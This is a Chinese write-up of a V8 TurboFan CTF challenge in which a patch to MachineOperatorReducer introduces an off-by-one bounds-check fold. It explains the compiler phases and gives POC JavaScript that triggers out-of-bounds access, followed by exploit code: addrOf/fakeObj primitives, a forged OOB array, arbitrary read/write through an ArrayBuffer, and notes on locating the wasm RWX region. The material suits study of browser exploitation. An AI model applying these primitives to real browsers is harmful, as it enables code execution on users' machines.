由于Patch的改动导致了Off-by-one,通过它实现一个完整的OOB利用。
环境准备
$ cat challenge.diff
1 | diff --git a/src/compiler/machine-operator-reducer.cc b/src/compiler/machine-operator-reducer.cc |
$ git apply ./challenge.diff
比赛当时使用的是最新的Chrome,我这里使用的v8与其环境不同,在wasmInstance到rwxAddrLoc的偏移有所差距。
漏洞分析
Patch
1 | diff --git a/src/compiler/machine-operator-reducer.cc b/src/compiler/machine-operator-reducer.cc |
该Patch只增加了两个字符,其作用于MachineOperatorReducer,是TurboFan优化的较晚阶段。
在其过程中被优化为左值<右值这个表达式,一个永真或永假的值。编译器会尝试把确定性的比较操作直接优化为一个布尔常量。
例如对于任意的x
,kMaxUInt32 < x
被折叠为False
,对于常数之间4 < 4
也会被折叠为False
。
而由于Patch的引入,右数被加了一,原本4 < 4
变成了4 < 5
,被错误折叠为Ture
。
CheckBound优化流程
在这里我们有必要了解一下CheckBound优化流程。
在simplified-lowering
阶段,[1]
处CheckBound
节点设置kAbortOnOutOfBounds
模式并在[2]
处被设置为CheckedUint32Bounds
。1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28 void VisitCheckBounds(Node* node, SimplifiedLowering* lowering) {
CheckParameters const& p = CheckParametersOf(node->op());
Type const index_type = TypeOf(node->InputAt(0));
Type const length_type = TypeOf(node->InputAt(1));
if (length_type.Is(Type::Unsigned31())) {
if (index_type.Is(Type::Integral32OrMinusZero())) {
// Map -0 to 0, and the values in the [-2^31,-1] range to the
// [2^31,2^32-1] range, which will be considered out-of-bounds
// as well, because the {length_type} is limited to Unsigned31.
VisitBinop(node, UseInfo::TruncatingWord32(),
MachineRepresentation::kWord32);
if (lower()) {
CheckBoundsParameters::Mode mode =
CheckBoundsParameters::kDeoptOnOutOfBounds;
if (lowering->poisoning_level_ ==
PoisoningMitigationLevel::kDontPoison &&
(index_type.IsNone() || length_type.IsNone() ||
(index_type.Min() >= 0.0 &&
index_type.Max() < length_type.Min()))) {
// The bounds check is redundant if we already know that
// the index is within the bounds of [0.0, length[.
mode = CheckBoundsParameters::kAbortOnOutOfBounds; // [1]
}
NodeProperties::ChangeOp(
node, simplified()->CheckedUint32Bounds(p.feedback(), mode)); // [2]
}
// [...]
}
在Effect linearization
阶段,CheckedUint32Bounds
节点会被优化成Uint32LessThan
节点,并绑定上其True
和False
分支。1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30Node* EffectControlLinearizer::LowerCheckedUint32Bounds(Node* node,
Node* frame_state) {
Node* index = node->InputAt(0);
Node* limit = node->InputAt(1);
const CheckBoundsParameters& params = CheckBoundsParametersOf(node->op());
Node* check = __ Uint32LessThan(index, limit);
switch (params.mode()) {
case CheckBoundsParameters::kDeoptOnOutOfBounds:
__ DeoptimizeIfNot(DeoptimizeReason::kOutOfBounds,
params.check_parameters().feedback(), check,
frame_state, IsSafetyCheck::kCriticalSafetyCheck);
break;
case CheckBoundsParameters::kAbortOnOutOfBounds: {
auto if_abort = __ MakeDeferredLabel();
auto done = __ MakeLabel();
__ Branch(check, &done, &if_abort);
__ Bind(&if_abort);
__ Unreachable();
__ Goto(&done);
__ Bind(&done);
break;
}
}
return index;
}
在lateoptimize
阶段,则被优化为左值 < 右值
这个表达式,即一个True
或者False
条件。1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29// Perform constant folding and strength reduction on machine operators.
Reduction MachineOperatorReducer::Reduce(Node* node) {
switch (node->opcode()) {
// [...]
case IrOpcode::kUint32LessThan: {
Uint32BinopMatcher m(node);
if (m.left().Is(kMaxUInt32)) return ReplaceBool(false); // M < x => false
if (m.right().Is(0)) return ReplaceBool(false); // x < 0 => false
if (m.IsFoldable()) { // K < K => K
return ReplaceBool(m.left().Value() < m.right().Value());
}
if (m.LeftEqualsRight()) return ReplaceBool(false); // x < x => false
if (m.left().IsWord32Sar() && m.right().HasValue()) {
Int32BinopMatcher mleft(m.left().node());
if (mleft.right().HasValue()) {
// (x >> K) < C => x < (C << K)
// when C < (M >> K)
const uint32_t c = m.right().Value();
const uint32_t k = mleft.right().Value() & 0x1F;
if (c < static_cast<uint32_t>(kMaxInt >> k)) {
node->ReplaceInput(0, mleft.left().node());
node->ReplaceInput(1, Uint32Constant(c << k));
return Changed(node);
}
// TODO(turbofan): else the comparison is always true.
}
}
break;
}
POC
虚假的POC
测试POC如下1
2
3
4
5
6
7
8
9
10
11function opt() {
let arr = [0, 1, 2, 3];
let idx = 4;
return arr[idx];
}
for(var i=0; i < 0x10000; i++)
opt()
var x = opt()
console.log(x)
`
~/browser/v8/out.gn/x64.release/d8 ./poc.js
运行后却并没有出现想象中的OOB,而是打印了undefined
我们通过--trace-turbo
对优化过程的IR
进行记录。
可以看到在loop peeling
阶段,其中34节点是比较,37节点是LoadElement
,实际上就是执行arr[idx]
。
在load elimination
阶段,上面所述的两个节点却被删除了。
具体了解一下load elimination
阶段做了什么。
以下部分内容以及相关思路来自p4nda师傅的文章。
首先以AddReducer
方法添加了10个reducer
,并在最后调用graph_reducer.ReduceGraph()
。1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37struct LoadEliminationPhase {
static const char* phase_name() { return "load elimination"; }
void Run(PipelineData* data, Zone* temp_zone) {
GraphReducer graph_reducer(temp_zone, data->graph(),
data->jsgraph()->Dead());
BranchElimination branch_condition_elimination(&graph_reducer,
data->jsgraph(), temp_zone);
DeadCodeElimination dead_code_elimination(&graph_reducer, data->graph(),
data->common(), temp_zone);
RedundancyElimination redundancy_elimination(&graph_reducer, temp_zone);
LoadElimination load_elimination(&graph_reducer, data->jsgraph(),
temp_zone);
CheckpointElimination checkpoint_elimination(&graph_reducer);
ValueNumberingReducer value_numbering(temp_zone, data->graph()->zone());
CommonOperatorReducer common_reducer(&graph_reducer, data->graph(),
data->broker(), data->common(),
data->machine(), temp_zone);
TypedOptimization typed_optimization(&graph_reducer, data->dependencies(),
data->jsgraph(), data->broker());
ConstantFoldingReducer constant_folding_reducer(
&graph_reducer, data->jsgraph(), data->broker());
TypeNarrowingReducer type_narrowing_reducer(&graph_reducer, data->jsgraph(),
data->broker());
AddReducer(data, &graph_reducer, &branch_condition_elimination);
AddReducer(data, &graph_reducer, &dead_code_elimination);
AddReducer(data, &graph_reducer, &redundancy_elimination);
AddReducer(data, &graph_reducer, &load_elimination);
AddReducer(data, &graph_reducer, &type_narrowing_reducer);
AddReducer(data, &graph_reducer, &constant_folding_reducer);
AddReducer(data, &graph_reducer, &typed_optimization);
AddReducer(data, &graph_reducer, &checkpoint_elimination);
AddReducer(data, &graph_reducer, &common_reducer);
AddReducer(data, &graph_reducer, &value_numbering);
graph_reducer.ReduceGraph();
}
};
我们接着查看graph_reducer.ReduceGraph()
,分别对每个节点调用上述添加的10个Reduce方法。1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37Reduction GraphReducer::Reduce(Node* const node) {
auto skip = reducers_.end();
for (auto i = reducers_.begin(); i != reducers_.end();) {
if (i != skip) {
Reduction reduction = (*i)->Reduce(node);
if (!reduction.Changed()) {
// No change from this reducer.
} else if (reduction.replacement() == node) {
// {replacement} == {node} represents an in-place reduction. Rerun
// all the other reducers for this node, as now there may be more
// opportunities for reduction.
if (FLAG_trace_turbo_reduction) {
StdoutStream{} << "- In-place update of " << *node << " by reducer "
<< (*i)->reducer_name() << std::endl;
}
skip = i;
i = reducers_.begin();
continue;
} else {
// {node} was replaced by another node.
if (FLAG_trace_turbo_reduction) {
StdoutStream{} << "- Replacement of " << *node << " with "
<< *(reduction.replacement()) << " by reducer "
<< (*i)->reducer_name() << std::endl;
}
return reduction;
}
}
++i;
}
if (skip == reducers_.end()) {
// No change from any reducer.
return Reducer::NoChange();
}
// At least one reducer did some in-place reduction.
return Reducer::Changed(node);
}
使用trace-turbo-reduction
对节点的修改和替换细节进行分析。
我们重点观察上面消失的34和37两个节点。
- In-place update of 34: NumberLessThan(33, 16) by reducer TypeNarrowingReducer
- Replacement of 34: NumberLessThan(33, 16) with 45: HeapConstant[0x0999a0780709 <false>] by reducer ConstantFoldingReducer
- In-place update of 35: Branch[True|CriticalSafetyCheck](45, 12) by reducer BranchElimination
- Replacement of 35: Branch[True|CriticalSafetyCheck](45, 12) with 60: Dead by reducer CommonOperatorReducer
- Replacement of 37: LoadElement[tagged base, 16, Signed32, kRepTaggedSigned|kTypeInt32, FullWriteBarrier](49, 33, 33, 60) with 60: Dead by reducer DeadCodeElimination
第二行可以看见34节点被替换成了HeapConstant <false>
,使得35节点得True
分支变为不可达,即37节点被DeadCodeElimination
清除,所以不能够到达LoadElement
节点。
那么为什么会被直接替换成False
呢?
我们首先跟踪TypeNarrowingReducer
,当opcode
是kNumberLessThan
时,如果left_type.Min() >= right_type.Max()
即左节点最小值大于等于右节点最大值,则类型被优化为op_typer_.singleton_false()
。1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30Reduction TypeNarrowingReducer::Reduce(Node* node) {
DisallowHeapAccess no_heap_access;
Type new_type = Type::Any();
switch (node->opcode()) {
case IrOpcode::kNumberLessThan: {
// TODO(turbofan) Reuse the logic from typer.cc (by integrating relational
// comparisons with the operation typer).
Type left_type = NodeProperties::GetType(node->InputAt(0));
Type right_type = NodeProperties::GetType(node->InputAt(1));
if (left_type.Is(Type::PlainNumber()) &&
right_type.Is(Type::PlainNumber())) {
if (left_type.Max() < right_type.Min()) {
new_type = op_typer_.singleton_true();
} else if (left_type.Min() >= right_type.Max()) {
new_type = op_typer_.singleton_false();
}
}
break;
}
//[...]
Type original_type = NodeProperties::GetType(node);
Type restricted = Type::Intersect(new_type, original_type, zone());
if (!original_type.Is(restricted)) {
NodeProperties::SetType(node, restricted);
return Changed(node);
}
return NoChange();
}
可以看到左节点为33,右节点为16。可以从IR
中看到33节点的值范围为[4,4],右节点是NumberConstant[4],即常数值4。
在ConstantFoldingReducer::Reduce
中34节点被替换为HeapConstant
。1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32Reduction ConstantFoldingReducer::Reduce(Node* node) {
DisallowHeapAccess no_heap_access;
// Check if the output type is a singleton. In that case we already know the
// result value and can simply replace the node if it's eliminable.
if (!NodeProperties::IsConstant(node) && NodeProperties::IsTyped(node) &&
node->op()->HasProperty(Operator::kEliminatable)) {
// TODO(v8:5303): We must not eliminate FinishRegion here. This special
// case can be removed once we have separate operators for value and
// effect regions.
if (node->opcode() == IrOpcode::kFinishRegion) return NoChange();
// We can only constant-fold nodes here, that are known to not cause any
// side-effect, may it be a JavaScript observable side-effect or a possible
// eager deoptimization exit (i.e. {node} has an operator that doesn't have
// the Operator::kNoDeopt property).
Type upper = NodeProperties::GetType(node);
if (!upper.IsNone()) {
Node* replacement = nullptr;
if (upper.IsHeapConstant()) {
replacement = jsgraph()->Constant(upper.AsHeapConstant()->Ref());
//[...]
if (replacement) {
// Make sure the node has a type.
if (!NodeProperties::IsTyped(replacement)) {
NodeProperties::SetType(replacement, upper);
}
ReplaceWithValue(node, replacement);
return Changed(replacement);
}
}
}
return NoChange();
}
如果想要触发OOB,我们就要从33和16两个节点来考虑。
16节点的值是element
的长度,所以我们只能考虑33节点。
33节点是CheckBounds
,我们从Typer阶段看起。1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22 Reduction Reduce(Node* node) override {
if (node->op()->ValueOutputCount() == 0) return NoChange();
switch (node->opcode()) {
case IrOpcode::k#
return UpdateType(node, TypeBinaryOp(node, x##Typer));
JS_SIMPLE_BINOP_LIST(DECLARE_CASE)
case IrOpcode::k#
return UpdateType(node, Type##x(node));
DECLARE_CASE(Start)
DECLARE_CASE(IfException)
// VALUE_OP_LIST without JS_SIMPLE_BINOP_LIST:
COMMON_OP_LIST(DECLARE_CASE)
SIMPLIFIED_COMPARE_BINOP_LIST(DECLARE_CASE)
SIMPLIFIED_OTHER_OP_LIST(DECLARE_CASE) // [1]
JS_SIMPLE_UNOP_LIST(DECLARE_CASE)
JS_OBJECT_OP_LIST(DECLARE_CASE)
JS_CONTEXT_OP_LIST(DECLARE_CASE)
JS_OTHER_OP_LIST(DECLARE_CASE)
在[1]
处有一个SIMPLIFIED_OTHER_OP_LIST
宏定义,定义如下:1
2
3
4
5
V(PlainPrimitiveToNumber) \
......
V(CheckBounds) \
V(CheckIf) \
变成如下表示:1
2case IrOpcode::kCheckBounds: \
return UpdateType(node, TypeCheckBounds(node));
TypeCheckBounds(node)
如下表示:1
2
3
4Type Typer::Visitor::TypeCheckBounds(Node* node) {
return typer_->operation_typer_.CheckBounds(Operand(node, 0),
Operand(node, 1));
}
其中又调用了CheckBounds()
。其中index
是实际的范围,length
控制最大边界。最后返回index
和mask
的交集。1
2
3
4
5
6
7
8
9Type OperationTyper::CheckBounds(Type index, Type length) {
DCHECK(length.Is(cache_.kPositiveSafeInteger));
if (length.Is(cache_.kSingletonZero)) return Type::None();
Type mask = Type::Range(0.0, length.Max() - 1, zone());
if (index.Maybe(Type::MinusZero())) {
index = Type::Union(index, cache_.kSingletonZero, zone());
}
return Type::Intersect(index, mask, zone());
}
1 | Type Type::Intersect(Type type1, Type type2, Zone* zone) { |
对于前面的POC相关的CheckBounds
的IR
如下图:
最终取[4,4]
和[0,2147483646]
的交集,返回[4,4]
。
此后在loop peeling
中NumberLessThan
的输入为[4,4]
以及常数[4]
,左边操作数的最小值4
满足>= 常数[4]
导致left_type.Min() >= right_type.Max()
从而被优化为HeapConstant <false>
,True
分支不可达所以被剪掉了。
真正的POC
想要触发OOB
,就不能让LoadElement
消失,也就是要能让CheckBounds返回的范围最小值严格小于Element
的length
。
所以我们要对CheckBounds
的第一个输入进行一定的修改。
在原本的测试POC中,我们直接赋值index = 4
导致该节点Range(4,4)
为一个数字常量。
在长亭的分析文章中,了解了两种绕过它(常数折叠)的方法。
方法1
第一种方法是给index
添加一点算术运算。1
2
3
4
5
6
7
8function opt(){
let arr = [1.1, 2, 3, 5]
let idx = 4;
idx &= 0xfff;
return arr[idx];
}
`
这样会在原来NumberConstant[4]
下面增加一个SpeculativeNumberBitwiseAnd
节点,然后在进入CheckBounds
节点,此时CheckBounds
返回的是[0,4]
,LoadElement
在这样的情况下不会消失,可以成功触发OOB。
以下是SpeculativeNumberBitwiseAnd
节点在Typer
的实现。1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30Type OperationTyper::NumberBitwiseAnd(Type lhs, Type rhs) {
DCHECK(lhs.Is(Type::Number()));
DCHECK(rhs.Is(Type::Number()));
lhs = NumberToInt32(lhs);
rhs = NumberToInt32(rhs);
if (lhs.IsNone() || rhs.IsNone()) return Type::None();
double lmin = lhs.Min();
double rmin = rhs.Min();
double lmax = lhs.Max();
double rmax = rhs.Max();
double min = kMinInt;
// And-ing any two values results in a value no larger than their maximum.
// Even no larger than their minimum if both values are non-negative.
double max =
lmin >= 0 && rmin >= 0 ? std::min(lmax, rmax) : std::max(lmax, rmax);
// And-ing with a non-negative value x causes the result to be between
// zero and x.
if (lmin >= 0) {
min = 0;
max = std::min(max, lmax);
}
if (rmin >= 0) {
min = 0;
max = std::min(max, rmax);
}
return Type::Range(min, max, zone());
}
lmin
和lmax
为4,rmin
和rmax
为255,可以看到返回的值范围是[0,4]
。
方法2
第二种方法是逃逸分析,因为逃逸分析在LoadElimination和MachineOperatorReducer之间,所以我们可以把一个常数放在非逃逸对象中来避免常数折叠。1
2
3
4
5
6function opt(){
let arr = [1.1, 2, 3, 5];
let o = {x: 4};
return arr[o.x];
}
其IR
如下所示:CheckBounds
节点的Range
最小值为0
,可以触发OOB。
漏洞利用
利用思路
构造addrOf原语
想法是当我们传入一个obj
,构建arr = [obj, obj, obj]
并通过越界修改该arr
的map
为floatMapObj
。
我们首先通过obj = [1.1, 2.2, 3.3]
获得一个floatMap
Double值。通过偏移获得objMap
,objMap = floatMap + 0xa0
。
构造fakeObj
,传入fakeObj
的addr
,修改map
为上面算出来的objMap
。fakeObj
返回的是object
类型。
获得floatMapObj
,最后构造addrOf
,传入obj
,修改map
为floatMapObj
,返回的float
值就是obj
的地址。
来自p4nda师傅的tips:这里有一个坑点,就是不能对一个PACKED_ELEMENTS类型的map位置直接写一个double,因为element一共有三种类型,并且是不可逆的改变,向PACKED_ELEMENTS类型的element写double会将double转换为一个HeapNumber,也是一个HeapObject,而非double值本身。
构造完整的OOB利用
构造一个fakeArray
,其中存放的是oobArray
的信息,获取fakeArray
地址之后通过偏移获得它的elements
的地址,再把该oobArray的elements
改到理想的oobArray开始搜索的位置,这里选择布置在fakeArrayAddr(array和obj之前)
。1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26var fakeArray = [
floatMap, // fake map
tC.u2f(0x0), // fake properties
tC.u2f(0x0), // fake elements
tC.u2f(0x100000000000), // fake length
1.1,
1.2
].slice(0);
var maxSize = 1028 * 8;
var obj = [];
var array = [];
array.push(new ArrayBuffer(0x200));
obj.push({
'a' : tC.u2f(0x1234),
'b' : tC.u2f(0x5678)
});
// get fakeArray address
var fakeArrayAddr = tC.f2u(addrOf(fakeArray));
var oobArrayAddr = fakeArrayAddr - 0x30;
success("oobArrayAddr", oobArrayAddr);
// rewrite oobArray's element with a start_element_addr
fakeArray[2] = tC.u2f(fakeArrayAddr);
var oobArray = fakeObj(tC.u2f(oobArrayAddr));
之后找出可用的oobArray[i]
,接着就是常规的OOB
了。
构造任意地址读写
构造一个稳定的addrOf
以及任意地址读写。1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17class ArbitraryRW{
leakObj(newObj){
obj[0].a = newObj;
return tC.f2u(oobArray[controllableObjIdx]);
}
read(addr){
oobArray[controllableArrayBufIdx] = tC.u2f(addr);
let tmp = new Float64Array(array[0],0,0x10);
return tC.f2u(tmp[0]);
}
write(addr, val){
oobArray[controllableArrayBufIdx] = tC.u2f(addr);
let tmp = new Float64Array(array[0],0,0x10);
tmp[0] = tC.u2f(val);
}
}
`
wasm
在复现的环境中,wasmInstance
距离存放rwx区域的地址相差0xe8
,在不同的环境中这个偏移往往不相同。
Exploit
1 | function hex(x) |